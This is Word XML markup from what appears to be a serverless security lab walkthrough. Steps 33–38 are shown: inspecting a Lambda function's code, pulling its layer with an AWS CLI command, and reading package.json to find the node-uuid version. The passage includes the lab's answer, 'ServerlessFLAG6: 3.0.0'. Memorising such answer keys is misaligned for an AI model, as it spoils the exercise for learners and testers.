    <w:p w14:paraId="3BAB69C1" w14:textId="6C2535A9" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 33: ​View index.js file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04E02A" w14:textId="1493816C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79D8C3FA" wp14:editId="19416A36">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>70200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283528</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1509840" cy="18000"/>
                <wp:effectExtent l="88900" t="139700" r="90805" b="134620"/>
                <wp:wrapNone/>
                <wp:docPr id="274" name="Ink 274"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId141">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1509840" cy="18000"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="13015FE4" id="Ink 274" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.35pt;margin-top:13.85pt;width:127.4pt;height:18.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">
                <v:imagedata r:id="rId142" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A209B16" wp14:editId="4740DF9D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>203400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>315568</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="88900" t="139700" r="88900" b="139700"/>
                <wp:wrapNone/>
                <wp:docPr id="273" name="Ink 273"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId143">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="360" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="03580AF7" id="Ink 273" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:11.8pt;margin-top:16.35pt;width:8.55pt;height:17.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">
                <v:imagedata r:id="rId144"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page27image66419744" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10FF15AE" wp14:editId="11DF642E">
            <wp:extent cx="5731510" cy="3597910"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8890"/>
            <wp:docPr id="89" name="Picture 89" descr="page27image6641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ge27image664197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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="681876EF" w14:textId="5A5D3D9F" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="0D979A33" w14:textId="7D944E5D" w:rsidR="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t>The index.js file reveals that the function is dependent on the external package "node-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t xml:space="preserve">". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D77199" w14:textId="77777777" w:rsidR="005E2BD8" w:rsidRPr="0094232C" w:rsidRDefault="005E2BD8" w:rsidP="0094232C"/>
    <w:p w14:paraId="3BC4D4EF" w14:textId="4F470959" w:rsidR="006642D5" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 34:​ Since the function is dependent on version 4 of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploaderLayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> layer, download the layer and check its content. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE1437" w14:textId="265A560D" w:rsidR="006642D5" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="006642D5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws lambda get-layer-version-by-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>arn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>arn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> arn:aws:lambda:ap-southeast-1:276384657722:layer:FileUploaderLayer:4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910D52E" w14:textId="77777777" w:rsidR="006642D5" w:rsidRDefault="006642D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="1CC7065F" w14:textId="72A402EB" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CB99009" wp14:editId="72665536">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>82800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1210725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5547240" cy="111240"/>
                <wp:effectExtent l="127000" t="215900" r="117475" b="206375"/>
                <wp:wrapNone/>
                <wp:docPr id="279" name="Ink 279"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId146">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5547240" cy="111240"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3DDA423D" id="Ink 279" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-.6pt;margin-top:81.2pt;width:451pt;height:37.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">
                <v:imagedata r:id="rId147" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="579083E5" wp14:editId="7F8B0B81">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>117360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>882405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5489640" cy="108360"/>
                <wp:effectExtent l="127000" t="215900" r="149225" b="209550"/>
                <wp:wrapNone/>
                <wp:docPr id="278" name="Ink 278"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId148">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5489640" cy="108360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7C4CBE22" id="Ink 278" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:2.15pt;margin-top:55.35pt;width:446.4pt;height:36.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">
                <v:imagedata r:id="rId149" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="276CFE39" wp14:editId="21C1A68C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>108720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1514925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5495040" cy="153360"/>
                <wp:effectExtent l="127000" t="215900" r="118745" b="215265"/>
                <wp:wrapNone/>
                <wp:docPr id="277" name="Ink 277"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId150">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5495040" cy="153360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7FDA7C12" id="Ink 277" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.5pt;margin-top:105.15pt;width:446.9pt;height:40.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">
                <v:imagedata r:id="rId151" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="617187DD" wp14:editId="38351F8A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>103320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>536085</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5506920" cy="105480"/>
                <wp:effectExtent l="127000" t="215900" r="144780" b="212090"/>
                <wp:wrapNone/>
                <wp:docPr id="276" name="Ink 276"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId152">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5506920" cy="105480"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0DCE9B00" id="Ink 276" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.1pt;margin-top:28.05pt;width:447.75pt;height:36.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">
                <v:imagedata r:id="rId153"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page28image66416208" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10674D8F" wp14:editId="2E0DF947">
            <wp:extent cx="5731510" cy="3124200"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="12700"/>
            <wp:docPr id="86" name="Picture 86" descr="page28image6641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age28image6641620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3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C23FC" w14:textId="35CEF717" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The Link to download the source code is present in the Location Attribute of Content section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9FBBB" w14:textId="77777777" w:rsidR="006642D5" w:rsidRPr="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="747FF8C5" w14:textId="50689510" w:rsidR="006642D5" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 35: ​Download the source code of the layer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70095178" w14:textId="572B599B" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 36: ​Extract the archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308752D8" w14:textId="352823CE" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page29image66413088" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70371DD6" wp14:editId="2EFCD946">
            <wp:extent cx="5731510" cy="3587750"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="19050"/>
            <wp:docPr id="83" name="Picture 83" descr="page29image6641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e29image6641308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587750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2535A" w14:textId="77777777" w:rsidR="006642D5" w:rsidRPr="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="5E26FED2" w14:textId="1EA58F86" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 37: ​Read the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> file of the package. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190AAFF5" w14:textId="16AE036C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CC615F6" wp14:editId="3A0A9065">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>441360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>779175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1277280" cy="40680"/>
                <wp:effectExtent l="63500" t="101600" r="81915" b="99060"/>
                <wp:wrapNone/>
                <wp:docPr id="280" name="Ink 280"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId156">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1277280" cy="40680"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2C76458C" id="Ink 280" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:31.9pt;margin-top:55.7pt;width:106.2pt;height:14.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">
                <v:imagedata r:id="rId157"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page30image66300896" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1185EBB6" wp14:editId="66112568">
            <wp:extent cx="5731510" cy="4057015"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="6985"/>
            <wp:docPr id="80" name="Picture 80" descr="page30image6630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ge30image6630089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4057015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D1289" w14:textId="4252523A" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>The version of the node-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> package used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function is 3.0.0 ServerlessFLAG6: ​3.0.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29453F" w14:textId="77777777" w:rsidR="006642D5" w:rsidRPr="0094232C" w:rsidRDefault="006642D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="0A5DE38C" w14:textId="56940B05" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00027484">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 38:​ View the source of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function (same as step 33) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF385E" w14:textId="542402AB" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00376F79" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04873936" wp14:editId="12589884">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>211680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1219962</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="353880" cy="26640"/>
                <wp:effectExtent l="88900" t="139700" r="90805" b="139065"/>
                <wp:wrapNone/>
                <wp:docPr id="297" name="Ink 297"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId159">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="353880" cy="26640"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2D3291C3" id="Ink 297" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:12.4pt;margin-top:87.55pt;width:36.35pt;height:19.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">
                <v:imagedata r:id="rId160" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05205BE6" wp14:editId="274325DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2244600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1301682</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="393840" cy="2160"/>
                <wp:effectExtent l="88900" t="139700" r="88900" b="137795"/>
                <wp:wrapNone/>
                <wp:docPr id="296" name="Ink 296"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId161">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="393840" cy="2160"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="355A0407" id="Ink 296" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:172.55pt;margin-top:94pt;width:39.5pt;height:17.1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">
                <v:imagedata r:id="rId162" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A03F555" wp14:editId="0C8A91B3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3496680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1152282</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="426960" cy="27000"/>
                <wp:effectExtent l="88900" t="139700" r="81280" b="138430"/>
                <wp:wrapNone/>
                <wp:docPr id="295" name="Ink 295"/>
                <wp:cNvGraphicFramePr/>
